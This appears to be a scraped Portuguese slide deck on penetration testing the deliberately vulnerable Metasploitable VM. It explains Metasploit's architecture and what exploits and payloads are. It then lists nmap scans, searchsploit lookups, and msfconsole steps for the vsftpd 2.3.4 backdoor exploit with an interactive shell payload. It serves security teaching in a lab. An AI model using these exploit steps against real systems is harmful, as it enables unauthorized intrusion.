Testes de Segurança
Nauber Gois
Metasploitable - Linux com vulnerabilidades
nmap -Pn [target IP address]
O REX(Ruby Extension Library) é o núcleo do Metasploit, ele disponibiliza a API com
funcionalidades que ajudam no desenvolvimento de um exploit, além de bibliotecas,
sockets e protocolos.
O CORE do framework é constituído de sub-sistemas que controlam sessões, módulos,
eventos é a API base.
O BASE fornece uma API amigável e simplifica a comunicação com outros módulos,
interfaces e plugins.
Na camada MODULES é onde reside os exploits e payloads, basicamente os exploits
são programas escritos para explorar alguma falha e o payload é como um
complemento para o exploit. Basicamente o payload é o código que vai ser injetado no
alvo, ao ser injetado alguma ação pré-definida será executada, por exemplo: (realizar
um download, executar um arquivo, apagar alguma informação ou estabelecer uma
conexão com outro sistema).
A camada de INTERFACES conta com o modo console onde temos um shell poderoso
que trabalha em conjunto com o SO, o cli que fornece uma interface onde é possível
automatizar testes de invasão e ainda temos interfaces web e gui.
Comandos do metasploit
Um exploit (em português
explorar, significando "usar algo
para sua própria vantagem") é
um pedaço de software, um
pedaço de dados ou uma
sequência de comandos a fim de
causar um comportamento
acidental ou imprevisto a ocorrer
no software ou hardware de um
computador ou em algum
eletrônico (normalmente
computadorizado).
No caso de um exploit, o payload é a parte do código injetada na
vítima que vai executar alguma ação: criar um usuário, iniciar um
processo, apagar arquivos, etc. Ou seja lá o que for que o atacante
quer que seja executado quando a vulnerabilidade for explorada com
sucesso pelo seu exploit.
nmap -sV [IP] -p 21
search vsftpd
msfconsole
When msfconsole is running select the
backdoor exploit using the following
command:
use exploit/unix/ftp/
vsftpd_234_backdoor
Type the following command to have a look
at the exploit options:
Show options
set rhost 192.168.
25.168
show payloads
set payload cmd/
unix/interact
run
Procurando por vulnerabilidades
nmap -sV [IP] -p 6667
search unreal ircd
nmap -sV [IP] -p 80
search apache
nmap -sV [IP] -p 139
search samba
nmap -sV [IP] -p8787
searchsploit -e Ruby DRb RMI
searchsploit -e Ruby
cat /usr/share/exploitdb/platforms/linux/remote/17058.rb
search name:Distributed Ruby Send instance_eval/syscall
Code Execution
Armitage
Invasaocom exploits

Invasaocom exploits

  • 1.
  • 3.
    Metasploitable - Linuxcom vulnerabilidades
  • 4.
    nmap -Pn [targetIP address]
  • 6.
    O REX(Ruby ExtensionLibrary) é o núcleo do Metasploit, ele disponibiliza a API com funcionalidades que ajudam no desenvolvimento de um exploit, além de bibliotecas, sockets e protocolos. O CORE do framework é constituído de sub-sistemas que controlam sessões, módulos, eventos é a API base. O BASE fornece uma API amigável e simplifica a comunicação com outros módulos, interfaces e plugins.
  • 7.
    Na camada MODULESé onde reside os exploits e payloads, basicamente os exploits são programas escritos para explorar alguma falha e o payload é como um complemento para o exploit. Basicamente o payload é o código que vai ser injetado no alvo, ao ser injetado alguma ação pré-definida será executada, por exemplo: (realizar um download, executar um arquivo, apagar alguma informação ou estabelecer uma conexão com outro sistema). A camada de INTERFACES conta com o modo console onde temos um shell poderoso que trabalha em conjunto com o SO, o cli que fornece uma interface onde é possível automatizar testes de invasão e ainda temos interfaces web e gui.
  • 8.
  • 10.
    Um exploit (emportuguês explorar, significando "usar algo para sua própria vantagem") é um pedaço de software, um pedaço de dados ou uma sequência de comandos a fim de causar um comportamento acidental ou imprevisto a ocorrer no software ou hardware de um computador ou em algum eletrônico (normalmente computadorizado).
  • 11.
    No caso deum exploit, o payload é a parte do código injetada na vítima que vai executar alguma ação: criar um usuário, iniciar um processo, apagar arquivos, etc. Ou seja lá o que for que o atacante quer que seja executado quando a vulnerabilidade for explorada com sucesso pelo seu exploit.
  • 20.
    nmap -sV [IP]-p 21 search vsftpd
  • 21.
    msfconsole When msfconsole isrunning select the backdoor exploit using the following command: use exploit/unix/ftp/ vsftpd_234_backdoor Type the following command to have a look at the exploit options: Show options
  • 22.
    set rhost 192.168. 25.168 showpayloads set payload cmd/ unix/interact run
  • 24.
  • 25.
    nmap -sV [IP]-p 6667 search unreal ircd
  • 29.
    nmap -sV [IP]-p 80 search apache
  • 33.
    nmap -sV [IP]-p 139 search samba
  • 42.
    nmap -sV [IP]-p8787 searchsploit -e Ruby DRb RMI searchsploit -e Ruby cat /usr/share/exploitdb/platforms/linux/remote/17058.rb
  • 43.
    search name:Distributed RubySend instance_eval/syscall Code Execution
  • 44.